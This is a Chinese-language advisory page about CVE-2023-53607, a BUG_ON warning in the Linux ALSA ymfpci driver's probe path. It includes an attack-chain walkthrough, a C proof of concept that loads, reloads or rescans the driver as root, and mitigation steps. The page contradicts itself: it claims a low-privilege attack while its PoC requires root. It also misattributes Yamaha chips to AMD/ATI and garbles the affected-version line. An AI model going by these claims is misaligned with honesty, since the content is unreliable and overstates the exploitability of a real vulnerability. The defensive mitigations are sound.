CVE-2023-53607 Linux内核ALSA ymfpci驱动探测函数BUG

漏洞信息

漏洞编号

CVE-2023-53607

漏洞类型

断言失败/拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核 snd_ymfpci驱动（ALSA声卡驱动）

漏洞概述

CVE-2023-53607是Linux内核中ALSA（Advanced Linux Sound Architecture）ymfpci声卡驱动的一个漏洞。该漏洞位于sound/pci/ymfpci/ymfpci_main.c文件的snd_ymfpci_create函数中，具体在探测（probe）阶段触发。漏洞的根本原因是snd_dma_buffer.bytes字段现在包含对齐后的内存大小，而原有的snd_BUG_ON()断言没有考虑到这一变化，导致在特定条件下触发内核警告和BUG_ON，从而引发系统不稳定或拒绝服务。

该漏洞在Linux内核6.1.21-lts版本中被发现并报告，从堆栈跟踪可以看出，当snd_ymfpci模块加载时，snd_ymfpci_create函数中的snd_BUG_ON()宏被触发，产生了内核警告信息。漏洞的CVSS评分为5.5，属于中等严重等级，其攻击向量为本地攻击（AV:L），需要低权限（PR:L），无需用户交互（UI:N），对机密性无影响（C:N），对完整性无影响（I:N），但对可用性影响较高（A:H）。

此漏洞影响使用AMD/ATI YMF724/YMF740/YMF744/YMF754等Yamaha PCI音频芯片的系统。当系统启动或加载snd_ymfpci模块时，存在缺陷的代码路径会被触发，可能导致内核警告、系统不稳定或拒绝服务状态。

技术细节

从技术层面分析，该漏洞的核心问题在于snd_dma_buffer结构体的bytes字段语义发生了变化。在Linux内核的DMA缓冲区管理中，bytes字段现在表示对齐后的实际分配大小，而非原始请求的大小。然而，snd_ymfpci驱动中的snd_ymfpci_create函数（位于sound/pci/ymfpci/ymfpci_main.c第2168行附近）中的snd_BUG_ON()断言仍然使用旧的大小检查逻辑，没有考虑对齐带来的差异。

当snd_ymfpci模块被加载时（通过pci_probe回调snd_card_ymfpci_probe），驱动会调用snd_ymfpci_create来初始化硬件。在该函数中，会分配DMA缓冲区用于音频数据传输。分配完成后，snd_dma_buffer.bytes字段会被设置为对齐后的大小（例如向上对齐到页面边界或特定的DMA对齐要求）。但原有的检查逻辑可能假设bytes字段等于原始请求大小，从而导致断言失败。

漏洞触发后的调用链为：work_for_cpu_fn -> process_one_work -> worker_thread -> snd_card_ymfpci_probe -> snd_ymfpci_create，在snd_ymfpci_create函数内部触发snd_BUG_ON()。

该漏洞的利用条件较为简单：攻击者只需要具有本地低权限访问权限，能够加载snd_ymfpci内核模块（通常通过modprobe或udev自动加载），即可触发此漏洞。虽然该漏洞不会直接导致权限提升或代码执行，但会引发内核警告并可能导致系统不稳定，在某些场景下可能造成拒绝服务。

攻击链分析

STEP 1

步骤1：获取本地访问

攻击者需要获取目标系统的本地低权限访问权限，可以通过普通用户账户或利用其他漏洞获得本地shell。

STEP 2

步骤2：确认目标硬件

攻击者检查目标系统是否配备Yamaha PCI音频芯片（YMF724/YMF740/YMF744/YMF754），可通过lspci命令确认。

STEP 3

步骤3：触发snd_ymfpci模块加载

攻击者通过modprobe snd-ymfpci命令或通过udev自动加载机制触发snd_ymfpci驱动的probe函数执行。

STEP 4

步骤4：触发BUG_ON断言

在snd_ymfpci_create函数中，snd_dma_buffer.bytes字段包含对齐后的大小，但snd_BUG_ON()断言未考虑此变化，导致断言失败并产生内核警告。

STEP 5

步骤5：造成系统不稳定

BUG_ON触发后，内核产生警告信息，在某些情况下可能导致系统不稳定、音频功能失效或拒绝服务状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53607 PoC - Trigger BUG_ON in snd_ymfpci probe function
// This PoC demonstrates how to trigger the vulnerability by loading the snd_ymfpci module
// on a system with a Yamaha PCI sound card (YMF724/YMF740/YMF744/YMF754)

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

/*
 * Method 1: Direct module loading
 * Simply loading the snd_ymfpci module will trigger the probe function
 * which contains the buggy snd_BUG_ON() assertion.
 */
int trigger_via_modprobe() {
    printf("Triggering CVE-2023-53607 via modprobe...\n");
    // Load the snd_ymfpci module - this will trigger pci_probe -> snd_card_ymfpci_probe -> snd_ymfpci_create
    int ret = system("modprobe snd-ymfpci 2>&1");
    if (ret != 0) {
        printf("modprobe failed (module may already be loaded or no compatible hardware)\n");
        return -1;
    }
    printf("Module loaded - check dmesg for BUG_ON warning\n");
    return 0;
}

/*
 * Method 2: Trigger via sysfs hotplug (if supported)
 * Some systems allow triggering PCI rescan which will re-probe the device
 */
int trigger_via_rescan() {
    printf("Triggering CVE-2023-53607 via PCI rescan...\n");
    // Write to PCI rescan sysfs entry to trigger re-probing
    int fd = open("/sys/bus/pci/rescan", O_WRONLY);
    if (fd < 0) {
        perror("open /sys/bus/pci/rescan");
        return -1;
    }
    write(fd, "1\n", 2);
    close(fd);
    printf("PCI rescan triggered - check dmesg for warnings\n");
    return 0;
}

/*
 * Method 3: Force module reload
 * If the module is already loaded, remove and reload it
 */
int trigger_via_reload() {
    printf("Attempting module reload...\n");
    system("rmmod snd_ymfpci 2>/dev/null");
    usleep(100000);
    int ret = system("modprobe snd-ymfpci 2>&1");
    if (ret != 0) {
        printf("Reload failed\n");
        return -1;
    }
    printf("Module reloaded - check dmesg for BUG_ON warning\n");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("=== CVE-2023-53607 PoC ===\n");
    printf("Linux Kernel ALSA ymfpci BUG_ON in probe function\n\n");
    
    /* Check if running as root (required for module operations) */
    if (getuid() != 0) {
        printf("Warning: This PoC requires root privileges for module operations\n");
        printf("Try: sudo %s\n", argv[0]);
    }
    
    /* Check for compatible hardware */
    int hwcheck = system("lspci | grep -i 'Yamaha' 2>/dev/null");
    if (hwcheck != 0) {
        printf("No Yamaha PCI sound card detected.\n");
        printf("This vulnerability requires YMF724/YMF740/YMF744/YMF754 hardware.\n");
        printf("On systems without this hardware, the module load will fail gracefully.\n\n");
    } else {
        printf("Yamaha PCI sound card detected!\n\n");
    }
    
    /* Try different trigger methods */
    if (argc > 1 && strcmp(argv[1], "rescan") == 0) {
        trigger_via_rescan();
    } else if (argc > 1 && strcmp(argv[1], "reload") == 0) {
        trigger_via_reload();
    } else {
        trigger_via_modprobe();
    }
    
    printf("\nCheck kernel logs with: dmesg | grep -i 'snd_ymfpci\|BUG_ON'\n");
    return 0;
}

影响范围

Linux kernel < 6.1.21-lts之后的修复版本

Linux kernel stable分支（需要应用补丁32b9bd7cfc2e2d92d595386add4e111b232b351f）

Linux kernel stable分支（需要应用补丁6be2e7522eb529b41c16d459f33bbdbcddbf5c15）

Linux kernel stable分支（需要应用补丁81d2a7e93c8322ca6b858f6736d7fc3d034e6c23）

Linux kernel stable分支（需要应用补丁96e34c88000febc83e41aa7db0b0a41676314818）

Linux kernel stable分支（需要应用补丁d0217b09910c081b6471181345ea5b24025edf51）

防御指南

临时缓解措施

在等待官方安全更新期间，可以采取以下临时缓解措施：1）在/etc/modprobe.d/目录下创建blacklist配置文件（如blacklist-ymfpci.conf），添加'blacklist snd_ymfpci'来阻止该模块自动加载；2）如果系统不使用Yamaha PCI声卡，可以在BIOS中禁用相关PCI设备；3）使用snd_ymfpci模块前，备份重要数据并监控系统日志；4）限制本地用户对modprobe等系统管理命令的访问权限；5）关注Linux内核安全公告，及时应用官方发布的补丁。

CVE-2023-53607 Linux内核ALSA ymfpci驱动探测函数BUG_ON漏洞